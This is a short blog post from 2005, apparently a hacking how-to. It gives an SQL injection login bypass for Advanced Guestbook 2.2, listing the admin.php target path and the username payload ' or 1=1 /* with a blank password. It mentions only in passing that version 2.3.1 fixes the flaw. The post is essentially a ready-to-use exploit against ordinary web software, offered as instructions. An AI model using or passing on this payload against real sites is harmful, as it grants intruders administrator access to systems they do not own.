Monday, December 05, 2005

How To 5

Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.

Target :

http://www.example.com/[GuestbookTarget]/admin.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)


It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability.

No comments:

Mac-On-Linux Divider Bar